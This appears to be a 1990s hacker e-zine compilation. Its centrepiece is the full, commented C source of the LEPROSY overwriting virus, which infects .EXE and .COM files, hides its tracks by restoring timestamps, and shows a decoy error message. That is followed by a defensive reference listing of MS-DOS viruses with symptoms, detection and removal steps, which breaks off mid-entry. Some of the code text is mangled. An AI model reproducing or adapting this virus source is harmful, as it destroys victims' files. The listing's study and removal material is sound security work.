^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ [It IS a wonderful tool, especially in] [The Right (Wrong?) Hands] a keyboard enhancer, and if you load it up with too many keyboard redefinitions at one time you will run out of environment space. This is ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ [Watch for] [This one, If it gives errors, The User] [Will be able to tell that ANSI commands] [Have been loaded] harmless and simply means that ANSI is full. But it will work fine to************************ -------------------------------------- Phile 8: Leprosy Source in Assembly ************************ ; 'Extra-Tiny' memory model startup code for Turbo C 2.0 ; ; This makes smaller executable images from C programs, by ; removing code to get command line arguments and the like. ; Compile with Tiny model flag, do not use any standard I/O ; library functions, such as puts() or int86(). ; ; This code courtesey PC Magazine, December 26, 1989. ; But nobody really needs to know that. _text segment byte public 'code' _text ends _data segment word public 'data' _data ends _bss segment word public 'bss' _bss ends dgroup group _text, _data, _bss _text segment org 100h begin: _text ends end begin ============================= Phile 9: ++++++++++++++++ Leprosy Source Code in C ++++++++++++++++ /* This file is part of the source code to the LEPROSY Virus 1.00 Copy-ya-right © 1990 by PCM2. This program can cause destruction of files; you're warned, the author assumes no responsibility for damage this program causes, incidental or otherwise. This program is not intended for general distribution -- irresponsible users should not be allowed access to this program, or its accompanying files. (Unlike people like us, of course...) / #pragma inline #define CRLF "\x17\x14" / CR/LF combo encrypted. / #define NO_MATCH 0x12 / No match in wildcard search. / / The following strings are not garbled; they are all encrypted / / using the simple technique of adding the integer value 10 to / / each character. They are automatically decrypted by / / 'print_s()', the function which sends the strings to 'stdout' / / using DOS service 09H. All are terminated with a dollar-sign / / "$" as per DOS service specifications. / char fake_msg[] = CRLF "Z\|yq\|kw~yylsq~yps~sxwowy\|\x83."; char virus_msg[3] = { CRLF "\x13XOa]PVK]R++cy\x7f\|}\x83}~owrk}looxsxpom~on\x81s~r~ro.", CRLF "\x13sxm\x7f\|klvonomk\x83ypVOZ\\Y]c;8::6k\x80s\|\x7f}sx\x80ox~onl\x83.", CRLF "\x13ZMW<sxT\x7fxoyp;CC:8Qyynv\x7fmu+\x17\x14." }; struct _dta /* Disk Transfer Area format for find. / { char findnext[21]; char attribute; int timestamp; int datestamp; long filesize; char filename[13]; } dta = (struct _dta ) 0x80; / Set it to default DTA. / const char filler[] = "XX"; / Pad file length to 666 bytes. / const char codestart = (char ) 0x100; / Memory where virus code begins. / const int virus_size = 666; / The size in bytes of the virus code. / const int infection_rate = 4; / How many files to infect per run. / char compare_buf[20]; / Load program here to test infection. / int handle; / The current file handle being used. / int datestamp, timestamp; / Store original date and time here. / char diseased_count = 0; / How many infected files found so far. / char success = 0; / How many infected this run. / / The following are function prototypes, in keeping with ANSI / / Standard C, for the support functions of this program. / int find_first( char fn ); int find_healthy( void ); int find_next( void ); int healthy( void ); void infect( void ); void close_handle( void ); void open_handle( char fn ); void print_s( char s ); void restore_timestamp( void ); /----------------------------------/ /* M A I N P R O G R A M / /----------------------------------/ int main( void ) { int x = 0; do { if ( find_healthy() ) { / Is there an un-infected file? / infect(); / Well, then infect it! / x++; / Add one to the counter. / success++; / Carve a notch in our belt. / } else { / If there ain't a file here... / _DX = (int) ".."; / See if we can step back to / _AH = 0x3b; / the parent directory, and try / asm int 21H; / there. / x++; / Increment the counter anyway, to / } / avoid infinite loops. / } while( x < infection_rate ); / Do this until we've had enough. / if ( success ) / If we got something this time, / print_s( fake_msg ); / feed 'em the phony error line. / else if ( diseased_count > 6 ) / If we found 6+ infected files / for( x = 0; x < 3; x++ ) / along the way, laugh!! / print_s( virus_msg[x] ); else print_s( fake_msg ); / Otherwise, keep a low profile. / return; } void infect( void ) { _DX = (int) dta->filename; / DX register points to filename. / _CX = 0x00; / No attribute flags are set. / _AL = 0x01; / Use Set Attribute sub-function. / _AH = 0x43; / Assure access to write file. / asm int 21H; / Call DOS interrupt. / open_handle( dta->filename ); / Re-open the healthy file. / _BX = handle; / BX register holds handle. / _CX = virus_size; / Number of bytes to write. / _DX = (int) codestart; / Write program code. / _AH = 0x40; / Set up and call DOS. / asm int 21H; restore_timestamp(); / Keep original date & time. / close_handle(); / Close file. / return; } int find_healthy( void ) { if ( find_first(".EXE") != NO_MATCH ) /* Find EXE? / if ( healthy() ) / If it's healthy, OK! / return 1; else while ( find_next() != NO_MATCH ) / Try a few more otherwise. / if ( healthy() ) return 1; / If you find one, great! / if ( find_first(".COM") != NO_MATCH ) /* Find COM? / if ( healthy() ) / If it's healthy, OK! / return 1; else while ( find_next() != NO_MATCH ) / Try a few more otherwise. / if ( healthy() ) return 1; / If you find one, great! / return 0; / Otherwise, say so. / } int healthy( void ) { int i; datestamp = dta->datestamp; / Save time & date for later. / timestamp = dta->timestamp; open_handle( dta->filename ); / Open last file located. / _BX = handle; / BX holds current file handle. / _CX = 20; / We only want a few bytes. / _DX = (int) compare_buf; / DX points to the scratch buffer. / _AH = 0x3f; / Read in file for comparison. / asm int 21H; restore_timestamp(); / Keep original date & time. / close_handle(); / Close the file. / for ( i = 0; i < 20; i++ ) / Compare to virus code. / if ( compare_buf[i] != (codestart+i) ) return 1; /* If no match, return healthy. / diseased_count++; / Chalk up one more fucked file. / return 0; / Otherwise, return infected. / } void restore_timestamp( void ) { _AL = 0x01; / Keep original date & time. / _BX = handle; / Same file handle. / _CX = timestamp; / Get time & date from DTA. / _DX = datestamp; _AH = 0x57; / Do DOS service. / asm int 21H; return; } void print_s( char s ) { char p = s; while ( p ) { /* Subtract 10 from every character. / p -= 10; p++; } _DX = (int) s; /* Set DX to point to adjusted string. / _AH = 0x09; / Set DOS function number. / asm int 21H; / Call DOS interrupt. / return; } int find_first( char fn ) { _DX = (int) fn; /* Point DX to the file name. / _CX = 0xff; / Search for all attributes. / _AH = 0x4e; / 'Find first' DOS service. / asm int 21H; / Go, DOS, go. / return _AX; / Return possible error code. / } int find_next( void ) { _AH = 0x4f; / 'Find next' function. / asm int 21H; / Call DOS. / return _AX; / Return any error code. / } void open_handle( char fn ) { _DX = (int) fn; /* Point DX to the filename. / _AL = 0x02; / Always open for both read & write. / _AH = 0x3d; / "Open handle" service. / asm int 21H; / Call DOS. / handle = _AX; / Assume handle returned OK. / return; } void close_handle( void ) { _BX = handle; / Load BX register w/current file handle. / _AH = 0x3e; / Set up and call DOS service. / asm int 21H; return; } ???????? ???????? Date Of Listing: October 10, 1991 ??????? ???????? Written By Dr. C ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???????? Corrupt Programming ?? ??????? Copyright © 1991 By GCA & Dr. C ?? ?? ?? ?? [CP.TXT] - HapiphaX Article ?? ?? ???????? ?? ??????? ? Copyright (C) 1991-1992 by Dr. C This article contains the compiled information from my continuing research effort into the identification, detection, and implementation of MS-DOS Computer Viruses. It is not intended to provide a very detailed technical description, but is should help the reader to understand what a virus generally does, how it activates, what it is doing to their system, and most importantly, how to get rid of it. The implementation is up to you. The reader of this article needs to keep in mind that the information provided is up-to-date ONLY to the date of the listing itself. If the listing is one month old, some items may not be accurate. Lastly, as new variants of known viruses are isolated, some of the characteristics of the variant may be different. ?????????????????????????????????????????????????????????????????????????????? TABLE OF CONTENTS I. Introduction. II. Virus Information Listing. III. Cross-Reference of Common Names for MS-DOS viruses. IV. Chart showing viral relationships between various viruses and variants. V. Personal Observations. A. The All Powerful Ansi-Bomb Special thanks go to iNVALiD MEDiA for putting up with my shit and for discovering the Rape-11 virus. - Dr. C / GCA / HaliphaX ?????????????????????????????????????????????????????????????????????????????? PART I. Introduction & Entry Format Each of the entries in the list consists of several fields. Below is a brief description of what is indicated in each of the fields. For fields where codes may appear, the meaning of each code in indicated. Virus Name: Field contains one of the more common names for the virus. The listing is alphabetized based on this field. Aliases: Other names that the same virus may be referred to by. These names are aliases or A.K.A.'s. V Status: This field contains one of the following values which indicate how common the virus is in the public domain. Common: The virus is one of the most common viruses reported to various groups which gather virus infection statistics. Most of these groups are in the United States. Where a virus has had many reports from a specific geographic area, the V Status field will contain "Common - xxxxxxxxx" where xxxxxxxxx is an indicator of geographic location. Endangered: The "Endangered" classification of viruses are viruses that are very uncommon and were fairly recently discovered or isolated. Due to some characteristics of these viruses, it is highly unlikely that they will ever become a widespread problem. It doesn't mean that they don't exist, just that the probability of someone getting these viruses is fairly low. Extinct: The "Extinct" classification is for viruses which at one time may have been widespread (ie. they are not a research virus which was never released into the public domain), but have not had a reported infection in at least one year. "Extinct" viruses will also include "viruses" which were submitted which actually don't replicate due to a flaw in their viral code, but if the flaw were corrected they might be successful. It is still possible that someone could become infected with one of these viruses, but the probability is extremely low. Myth: "Myth" viruses are viruses which have been discussed among various groups for some time (in excess of one year), but are not known to actually exist as either a public domain or research virus. Probably the best case of a "Myth" virus is the Nichols Virus. Rare: "Rare" viruses are viruses which were recently (within the last year) isolated but which do not appear to be widespread. These viruses, as a general rule, will be viruses which have characteristics that would make them a possible future problem. "Rare" viruses have a higher probability of someone becoming infected than Endangered or Extinct viruses, but are much less likely to be found than a "Common" virus. Research: A "Research" virus is a virus which was originally received by at least one anti-viral researcher directly from its source or author. These viruses are not known to have been released into the public domain, so they are highly unlikely to be detected on computer systems other than researchers. Rumored: The "Rumored" virus classification are for viruses which the author has received information about, but that no sample of the virus has been made available for analysis. Any viruses in this classification should be considered with a grain of salt, they may not actually exist. Unknown: The "Unknown" classification is for those viruses where the original submission of the virus to anti-viral researchers is suspect for any number of reasons, or that there is very little information known about the origin of the virus. New: The "New" category is for viruses which were recently received by the author but cannot at the present time be researched in depth. Instead of leaving these viruses out of the listing all together, they will be listed but with a "New" status. Discovery: First recorded discovery date. Origin: Author/country of origin Symptoms: Changes to system that may be noticed by users: messages, growth in files, TSRs/ Resident TOM (change in CHKDSK return), BSC - boot sector change (may require cold boot from known-good protected floppy to find), corruption of system or files, frequent re-boots, slowdowns. Origin: Either credited or assumed to be in country of discovery. Eff Length: The length of the viral code after it has infected a program or system component. For boot-sector infectors, the length is indicated as N/A, for not applicable. Type Code: The type codes indicated for a virus indicate general behavior characteristics. Following the type code(s) is a brief text description. The type codes used are: A = Infects all program files (COM & EXE) B = Boot virus C = Infects COM files only D = Infects DOS boot sector on hard disk E = Infects EXE files only F = Floppy (360K) only K = Infects COMMAND.COM M = Infects Master boot sector on hard disk N = Non-resident (in memory) O = Overwriting virus P = Parasitic virus R = Resident (in memory) (below 640k - segment A000) a - in unused portion of allocated memory (does not change free memory, such as virus resident in CLI stack space or unused system memory) Example: LeHigh f - in free (user) memory below TOM (does not prevent overwriting) Example: Icelandic h - in high memory but below TOM (Resides in high system memory, right below TOM. Memory is allocated so it won't be accidently overwritten.) Example: Flash s - in low (system/TSR) memory (reduces free memory, typically uses a normal Int 21/Int 28 TSR) Example: Jerusalem t - above TOM but below 640k (moves Int 12 return) (Reduces total memory size and free memory) Example: Pakistani Brain (above 640k) b - in BIOS/Video/Shadow RAM area (segment A000 - FFFF) e - in extended/expanded memory (above 1 Meg) S = Spawning or companion file virus (This type of virus creates another file on the disk which contains the actual viral code. Example: Aids II) T = Manipulation of the File Allocation Table (FAT) X = Manipulation/Infection of the Partition Table Detection Method: This entry indicates how to determine if a program or system has been infected by the virus. Where the virus can be detected with a shareware, public domain, or readily available commercial program, it is indicated. Note that a "+" after the anti-viral product's version number indicates that versions of the product from the indicated version forward are applicable. Programs referenced in the listing are: AVTK - Dr. Solomon's Anti-Virus Toolkit <commercial> F-PROT - Fridrik Skulason's F-Prot detector/disinfector IBM Scan - IBM's Virus Scanning Program <commercial> Pro-Scan - McAfee Associates' Pro-Scan Program <commercial> VirexPC - MicroCom's VirexPC Program <commercial> VirHunt - Digital Dispatch Inc's VirHunt Program <commercial> ViruScan - McAfee Associates' ViruScan Program ViruScan/X- McAfee Associates' ViruScan Program with /X switch Removal Instructions: Brief instructions on how to remove the virus. Where a shareware, public domain, or readily available commercial program is available which will remove the virus, it is indicated. Programs referenced in the listing are: AntiCrim - Jan Terpstra's AntiCrime program CleanUp - John McAfee's CleanUp universal virus disinfector. Note: CleanUp is only indicated for a virus if it will disinfect the file, rather than delete the infected file. DOS COPY - Use the DOS COPY command to copy files from infected non-bootable disks to newly formatted, uninfected disks. Note: do NOT use the DOS DISKCOPY command on boot sector infected disks, or the new disk will also be infected! DOS SYS - Use the DOS SYS command to overwrite the boot sector on infected hard disks or diskettes. Be sure you power down the system first, and boot from a write protected master diskette, or the SYS command will copy the infected boot sector. F-PROT - Fridrik Skulason's F-Prot detector/disinfector, Version 1.07. M-3066 - Traceback virus disinfector. MDisk - MD Boot Virus Disinfector. Be sure to use the program which corresponds to your DOS release. Pro-Scan - Pro-Scan Virus Identifier/Disinfector <Commercial>. Saturday - European generic Jerusalem virus disinfector. Scan/D - ViruScan run with the /D option. Scan/D/A - ViruScan run with the /D /A options. Scan/D/X - ViruScan run with the /D /X options. UnVirus - Yuval Rakavy's disinfector for Brain, Jerusalem, Ping Pong, Ping Pong-B, Typo Boot, Suriv 1.01, Suriv 2.01, and Suriv 3.00 viruses. VirexPC - MicroCom's VirexPC Detector/Disinfector Note: VirexPC is only indicated if it will actually disinfect the virus, not just delete the infected file. VirHunt - Digital Dispatch Inc's VirHunt Detector/Disinfector Note: VirHunt is only indicated if it will actually disinfect the virus on all major variants. Virus Buster - Yuval Tal's Virus Buster Detector/Disinfector General Comments: This field includes other information about the virus, including but not limited to: historical information, possible origin, possible damage the virus may cause, and activation criteria. ------------------------------------------------------------------------------- PART II. MS-DOS Virus Information Virus Name: 382 Recovery Virus Aliases: 382 V Status: Rare Discovery: July, 1990 Symptoms: first 382 bytes of .COM files overwritten, system hangs, spurious characters on system display, disk drive spinning Origin: Taiwan Eff Length: N/A Type Code: ONAK - Overwriting Non-Resident .COM & .EXE Infector Detection Method: ViruScan V66+, Pro-Scan 2.01+ Removal Instructions: Scan/D, or Delete infected files General Comments: The 382 Recovery Virus was isolated in July 1990 in Taiwan. It is a non-resident generic infector of .COM and .EXE files, including COMMAND.COM. Each time a program infected with the 382 Recovery Virus is executed, the virus will check the current directory for a .COM files that has not been infected with the virus. If it finds an uninfected .COM file, it will infect it. If the original file was less than 382 bytes in length, the infected file will now be 382 bytes in length. Files which were originally greater than 382 bytes in length will not show any increase in length. Infected files always have the first 382 bytes of the file overwritten to contain the virus's code. Once all .COM files in the current directory are infected, the next time an infected .COM file is executed the virus will rename all .EXE files to .COM files. These renamed files, however, may or may not later become infected. Symptoms of the 382 Recovery Virus being present on a file are that the program will not execute properly. In some cases, the program will hang upon execution requiring the system to be rebooted. In other cases, spurious characters will appear on the system display and the program will not run. Lastly, the system may do nothing but leave the disk drive spinning, requiring the system to be powered off and rebooted. Since the first 382 bytes of infected files have been overwritten, the infected files cannot be recovered. The original 382 bytes of the file are permanently lost. Infected files should be deleted or erased and replaced with backup copies known to be free of infection. Virus Name: 405 Aliases: V Status: Extinct Discovery: 1987 Symptoms: .COM files fail to run, first 405 bytes of .COM files overwritten Origin: Austria or Germany Eff Length: N/A Type Code: ONC - Overwriting Non-Resident .COM Infector Detection Method: ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan 1.4+, VirexPC 1.1+, VirHunt 2.0+ Removal Instructions: Scan/D/X, F-Prot, or delete infected files General Comments: The 405 virus is an overwriting virus which infects only .COM files in the current directory. If the length of the .COM file was originally less than 405 bytes, the resulting infected file will have a length of 405 bytes. This virus currently cannot recognize .COM files that are already infected, so it will attempt to infect them again. The 405 Virus doesn't carry an activation date, and doesn't do anything but replicate in the current directory. However, since it overwrites the first 405 bytes of .COM files, infected files are not recoverable except by replacing them from uninfected backups or master distribution disks. Virus Name: 512 Aliases: 512-A, Number of the Beast Virus, Stealth Virus V Status: Rare Discovery: November, 1989 Origin: Bulgaria Symptoms: Program crashes, system hangs, TSR. Eff Length: 512 Bytes Type Code: PRCK - Parasitic Resident .COM Infector Detection Method: ViruScan V58+, VirexPC 1.1+ Removal Instructions: CleanUp V58+ General Comments: The 512 virus is not the same as the Original Friday The 13th COM virus. The 512 virus was originally isolated in Bulgaria in November, 1989, by Vesselin Bontchev. It infects .COM files, including COMMAND.COM, installing itself memory resident when the first infected program is run. After becoming memory resident, any .COM file openned for any reason will become infected if its uninfected length is at least 512 bytes. Systems infected with the 512 virus may experience program crashes due to unexpected errors, as well as system hangs. Damage may occur to infected files if the system user runs CHKDSK with the /F parameter as the length of the program in the directory entry will not match the actual disk space used. CHKDSK will then adjust the file allocation resulting in damaged files. The virus's alias of "Number of the Beast" Virus is because the author of the virus used a signature of text 666 near the end of the virus to determine if the file is already infected. Since 512 adds its viral code to the end of infected files, it is easy to verify that a file is infected by the 512 virus by checking for this signature. Known variant(s) of the 512 Virus are: 512-B : Similar to the 512 Variant, except that the DOS version check in the original virus has been omitted. The author's signature of '666' has been omitted. 512-C : Similar to the 512-B Variant, minor code changes. 512-D : Similar to the 512-C Variant, except that the virus no longer checks to see if a file has the System Attribute on it before infecting it. Virus Name: 646 Aliases: Vienna C V Status: Rare Discovery: October, 1990 Symptoms: COMMAND.COM & .COM growth Origin: Unknown Eff Length: 646 Bytes Type Code: PNCK - Parasitic Non-Resident COM Infector Detection Method: ViruScan V71+, Pro-Scan 2.01+ Removal Instructions: Pro-Scan 2.01+, Scan/D, or Delete infected files General Comments: The 646 Virus was discovered in October, 1990. Its origin is unknown. This virus is a non-resident infector of .COM files, including COMMAND.COM. When a file infected with the 646 Virus is executed, the virus will infect one other .COM file in the current directory. Infected files will increase in size by 646 bytes, with the virus being located at the end of the infected file. Infected files can be easily identified as they will always end with the hex string: "EAF0FFFFFF". This virus appears to do nothing except replicate. Virus Name: 903 Aliases: V Status: New Discovery: January, 1991 Symptoms: .COM file growth; TSR; System hangs Origin: France Eff Length: 903 Bytes Type Code: PRsCK - Parasitic Resident COM Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The 903 Virus was discovered France in January, 1991. This virus is not a particularly viable virus since replicated samples will not further replicate. It is possible that the original sample is corrupted. This virus infects .COM program, including COMMAND.COM. When the original sample of 903 is executed, this virus will install itself memory resident as a 1,216 byte low system memory TSR. It will hook interrupt 21. At that time, it will infect COMMAND.COM, adding 903 bytes to the beginning of the program. The following message is then displayed: "Fichier introuvable" Once memory resident, this virus will infect up to three .COM programs in the current directory if the original sample is again executed. Later execution of infected files (other than the original) will not result in the virus spreading to other files. The virus will also infect files when the DOS Copy command is used, but only if the source and target files are in the current directory. Infected .COM programs will have a file size increase of 903 bytes, the virus will be located at the beginning of the infected program. The file date and time in the disk directory will not be altered by the virus. If 903 becomes memory resident from other than the original sample, it will not replicate to other .COM programs. The "Fichier introuvable" message is not displayed with other than the original sample. Some programs may hang when they are executed on infected systems. It is unknown if 903 does anything destructive. Virus Name: 1008 Aliases: Suomi, Oulu V Status: Rare Discovery: June, 1990 Symptoms: COMMAND.COM growth, Internal Stack Errors, System Halt on Boot Origin: Helsinki, Finland Eff Length: 1,008 Bytes Type Code: PRCK - Parasitic Resident COM Infector Detection Method: ViruScan V64+, F-Prot 1.12+, Pro-Scan 2.01+ Removal Instructions: Scan/D, F-Prot 1.12+, Pro-Scan 2.01+, or delete infected files General Comments: The 1008 Virus was discovered in June, 1990 by Petteri Jarvinen of Helsinki, Finland. It is a memory resident .COM infector, and will infect COMMAND.COM. This virus is also sometimes referred to as the Suomi Virus. The first time a program infected with the 1008 virus is executed, the virus will install itself memory resident. COMMAND.COM is also infected at this time, resulting in its length increasing by 1,008 Bytes. The increase in file size of COMMAND.COM cannot be seen by doing a directory listing if the virus is present in memory. Booting a system with an infected copy of COMMAND.COM may result in an internal stack error, and the system being halted. This effect was noted on the author's test machine which is a 640K XT-clone running Microsoft MS-DOS Version 3.30. After the virus is memory resident, it will infect any .COM file which is executed, adding 1,008 bytes to the file length. The file length increase cannot be seen by doing a directory listing if the virus is present in memory. Virus Name: 1210 Aliases: Prudents Virus V Status: Rare Discovery: December, 1989 Symptoms: .EXE growth, disk write failure, TSR Origin: Spain Eff Length: 1,210 Bytes Type Code: PRE - Parasitic Resident .EXE Infector Detection Method: ViruScan V61+, Pro-Scan 1.4+, F-Prot 1.12+, VirHunt 2.0+ Removal Instructions: Scan/D, F-Prot 1.12+, VirHunt 2.0+, or delete infected files General Comments: The 1210, or Prudents Virus, was first isolated in Barcelona, Spain, in December 1989. The 1210 is a memory resident virus, infecting .EXE files when they are executed. This virus activates between May 1st and May 4th of any year, causing disk writes to be changed to disk verifies, so writes to the disk never occur between these dates. Virus Name: 1226 Aliases: V1226 V Status: Rare Discovery: July 1990 Symptoms: .COM growth, decrease in system and free memory, system hangs, spurious characters displayed in place of program executing, disk drive spinning Origin: Bulgaria Eff Length: 1,226 Bytes Type Code: PRhC - Parasitic Resident .COM Infector Detection Method: ViruScan V66+, Pro-Scan 2.01+ Removal Instructions: Scan/D, or delete infected files General Comments: The 1226 Virus was isolated in Bulgaria in July 1990 by Vesselin Bontchev. This virus is a memory resident generic .COM infector, though it does not infect COMMAND.COM. The 1226 Virus is a self- encrypting virus, and simple search string algorithms will not work to detect its presence on a system. The first time a program infected with the 1226 virus is executed, the virus will install itself memory resident, reserving 8,192 bytes of memory at the top of free memory. Interrupt 2A will be hooked. Once 1226 is memory resident, the virus will attempt to infect any .COM file that is executed that is at least 1,226 bytes in length before infection. The virus is rather "buggy" and the infection process is not always entirely successful. Successfully infected files will increase in length by 1,226 bytes. This virus will infect .COM files multiple times, it is unable to determine that the file is already infected. Each time the file is infected it will grow in length by another 1,226 bytes. Eventually, the .COM files will grow too large to fit into memory. Systems infected with the 1226 virus may experience unexpected system hangs when attempting to execute programs. Another affect is that instead of a program executing, a line or two of spurious characters will appear on the system display. Lastly, infected systems will always indicate that they have 8,192 less bytes of total system and free memory available than is actually on the machine. There are two later versions of this virus, 1226D and 1226M, which are much better replicators than the original 1226 virus. These two variants are documented as 1226D in this document due to their different characteristics. Also see: 1226D Virus Name: 1226D Aliases: V1226D V Status: Rare Discovery: July 1990 Symptoms: .COM growth, decrease in system and free memory Origin: Bulgaria Eff Length: 1,226 Bytes Type Code: PRhC - Parasitic Resident .COM Infector Detection Method: ViruScan V66+, Pro-Scan 2.01+ Removal Instructions: Scan/D, or delete infected files General Comments: The 1226D Virus was isolated in Bulgaria in July 1990 by Vesselin Bontchev. This virus is a memory resident generic .COM infector, though it does not infect COMMAND.COM. The 1226D Virus is a self- encrypting virus, and simple search string algorithms will not work to detect its presence on a system. The 1226D Virus is based on the 1226 Virus, in fact it is a decrypted version of the 1226 Virus. It is a better replicator, infecting successfully on file opens as well as when .COM files are executed. The first time a program infected with the 1226 virus is executed, the virus will install itself memory resident, reserving 8,192 bytes of memory at the top of free memory. Total system and free memory are decreased by 8,192 bytes. Interrupt 2A will be hooked. Once 1226 is memory resident, the virus will attempt to infect any .COM file that is executed that is at least 1,226 bytes in length before infection. Infected files will increase in length by 1,226 bytes. As with the original 1226 Virus, a .COM file may be infected multiple times by the 1226D Virus as the virus is unable to determine that the file was previously infected. Each infection will result in another 1,226 bytes being added to the infected file's length. Eventually, the .COM files will grow too large to fit into memory. In addition to infecting .COM files when they are executed, the 1226D Virus will infect .COM files with a length of at least 1,226 bytes when they are openned for any reason. The simple act of copying a .COM file with the virus memory resident will result in both the source and target files being infected. Unlike the 1226 Virus, systems infected with the 1226D virus will not experience the system hangs or spurious characters symptomatic of the 1226 virus. Infected system will still indicate that they have 8,192 bytes less of total system memory than is installed on the machine. Known variant(s) of 1226D are: 1226M/V1226M : Similar to the 1226D virus, except that files are not infected on file open, only when they are executed. Also see: 1226 Virus Name: 1253 Aliases: AntiCad, V-1 V Status: Rare Discovery: August, 1990 Symptoms: TSR; BSC; COMMAND.COM & .COM file growth; partition table change Origin: Austria Eff Length: 1,253 Bytes Type Code: PRsBCKX - Parasitic Resident .COM & Partition Table Infector Detection Method: ViruScan V66+, Pro-Scan 2.01+ Removal Instructions: Pro-Scan 2.01+, Scan/D plus MDisk/P General Comments: The 1253 Virus was submitted in August 1990. It is believed to have originated in (or at least to have been first isolated in) Austria. 1253 is a generic infector of .COM files, including COMMAND.COM. It also infects the boot sector of diskettes and the partition table of hard disks. The first time a program infected with the 1253 Virus is executed, the virus will install itself memory resident as a low system memory TSR. The TSR will be 2,128 bytes in length, hooking interrupts 08, 13, 21, and 60. Total system memory will remain unchanged, and free memory will decrease by 2,128 bytes. At this time, the partition table of the system's hard disk is infected with the 1253 virus. If the infected program was executed from a diskette, the diskette's boot sector will also be infected. Each time a .COM file is executed with the virus resident in memory, the .COM file will be infected if it hasn't previously been infected. The 1253 Virus appends its viral code to the end of the .COM file, and then changes the first few bytes of the program to be a jump to the appended code. Infected files increase in length by 1,253 bytes, and the virus makes no attempt to hide the increase when the directory is displayed. Infected files will also have their fourth thru sixth bytes set to "V-1" (hex 562D31). Any diskettes which are accessed while the virus is present in memory will have their boot sector infected with this virus. Newly formatted diskettes, likewise, will be infected immediately. The 1253 virus is destructive when it activates. The author of this listing was able to get it to activate by setting the system date to December 24 and then executing an infected program on drive A:. The virus promptly went and overwrote the entire diskette in drive A: with a pattern of 9 sectors of what appears to be a program fragment. Once the virus has started to overwrite a diskette, the only way to stop the disk activity is to power off the system. The virus in the partition table and/or diskette boot sector is of special note. When the system is booted from the hard disk or diskette with the virus in the partition table or boot sector, the virus will install itself memory resident. At this time, the virus resides above the top of system memory but below the 640K DOS boundary. The change in total system memory and available free memory will be 77,840 bytes. It can be seen with the CHKDSK command. At this time, any .COM program executed will be infected with the 1253 virus, even though no programs on the hard disk may contain this virus before the system boot occurred. One effect of this virus, once the system has been booted from an infected hard drive or floppy is that the FORMAT command may result in unexpected disk activity to inactive drives. For example, on the author's system, when formatting a diskette in drive A: with the current drive being drive C:, there was always disk activity to drive B:. Disinfecting the 1253 virus required that besides disinfecting or deleting infected .COM programs, the hard disks partition table and the boot sector of any diskettes exposed to the infected system must be disinfected. The virus can be removed safely from the partition table and diskette boot sectors by using MDisk with the /P option after powering off the system and rebooting from a write-protected uninfected boot diskette. If the partition table and diskette boot sectors are not disinfected, the system will promptly experience reinfection of .COM files with the virus following a system boot from the hard disk or diskette. Disinfecting the partition table and boot sectors, when done properly, will also result in the system's full memory again being available. It is unknown if there are other activation dates for this virus, or if it will overwrite the hard disk if an infected program is executed on December 24 from the hard disk. Virus Name: 1260 Aliases: V2P1 V Status: Research Discovery: January, 1990 Symptoms: .COM file growth Origin: Minnesota, USA Eff Length: 1,260 Bytes Type Code: PNC - Parasitic Encrypting Non-Resident .COM Infector Detection Method: ViruScan V57+, IBM Scan, Pro-Scan 1.4+, F-Prot 1.12+, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: CleanUp V57+, Pro-Scan 1.4+, F-Prot 1.12+, VirHunt 2.0+ General Comments: The 1260 virus was first isolated in January, 1990. This virus does not install itself resident in memory, but is it extremely virulent at infecting .COM files. Infected files will have their length increased by 1,260 bytes, and the resulting file will be encrypted. The encryption key changes with each infection which occurs. The 1260 virus is derived from the original Vienna Virus, though it is highly modified. This virus was developed as a research virus by Mark Washburn, who wished to show the anti-viral community why identification string scanners do not work in all cases. The encryption used in 1260 is one of many possible cases of the encryption which may occur with Washburn's later research virus, V2P2. Also see: V2P2, V2P6, V2P6Z Virus Name: 1381 Virus Aliases: V Status: Rare Discovery: June, 1990 Symptoms: .EXE growth Origin: Eff Length: 1,381 Bytes Type Code: PNE - Parasitic Non-Resident .EXE Infector Detection Method: ViruScan V64+, Pro-Scan 2.01+ Removal Instructions: Scan/D, or Delete infected files General Comments: The 1381 Virus was isolated in June, 1990. It is a non-resident generic .EXE infector. Each time a program infected with the 1381 Virus is executed, the virus will attempt to infect one other .EXE file on the current drive. An .EXE file will only be infected if it is greater than 1,300 bytes in length before infection. After infection, files will have increased in length by between 1,381 and 1,389 bytes. The virus can be found at the end of infected files. Infected files will also contain the following text strings: "INTERNAL ERROR 02CH. PLEASE CONTACT YOUR HARDWARE MANUFACTURER IMMEDIATELY ! DO NOT FORGET TO REPORT THE ERROR CODE !" It is currently unknown what the 1381 Virus does, or what prompts it to display the above message. Virus Name: 1392 Aliases: Amoeba Virus V Status: Rare Discovery: March, 1990 Symptoms: TSR, .COM & .EXE growth, dates modified Origin: Indonesia Eff Length: 1,392 Bytes Type Code: PRA - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V61+, VirexPC 1.1+, F-Prot 1.12+, VirHunt 2.0+ Removal Instructions: Scan/D, F-Prot 1.12+, VirHunt 2.0+, or delete infected files General Comments: The 1392, or Amoeba, Virus was first isolated in Indonesia in March 1990. The 1392 virus is a memory resident virus that infects .COM and .EXE files, including COMMAND.COM. As files are infected, their creation/modification date is changed to the date the files were infected. This virus does not appear to cause any destructive damage. The following message appears in the virus, which is where its alias of Amoeba was derived from: "SMA KHETAPUNK - Nouvel Band A.M.O.E.B.A" Virus Name: 1554 Aliases: Ten Bytes, 9800:0000 Virus, V-Alert, 1559 V Status: Rare Discovery: February, 1990 Symptoms: .COM & .EXE growth, TSR, linkage corruption, system hang Origin: Eff Length: 1,554 Bytes Type Code: PRfAK - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V58+, IBM Scan, Pro-Scan 1.4+, VirexPC 1.1+, AVTK 3.5+, F-Prot 1.12+, VirHunt 2.0+ Removal Instructions: Scan/D, F-Prot 1.12+, VirHunt 2.0+, Pro-Scan 2.01+ General Comments: The 1554 virus was accidently sent out over the VALERT-L network on February 13, 1990 to approximately 600 subscribers. When a program is executed that is infected with the 1554 virus, the virus installs itself memory resident. It will then proceed to infect .COM over 1000 bytes in length and .EXE files over 1024 bytes in length, including COMMAND.COM, increasing their length after infection by 1,554 to 1,569 bytes. The 1554 virus activates in September, October, November, or December of any year. Upon activation, any files which are written will be missing the first ten bytes. At the end of these files, ten bytes of miscellaneous characters will appear. In effect, both programs and data files will be corrupted. If the 1554 Virus is 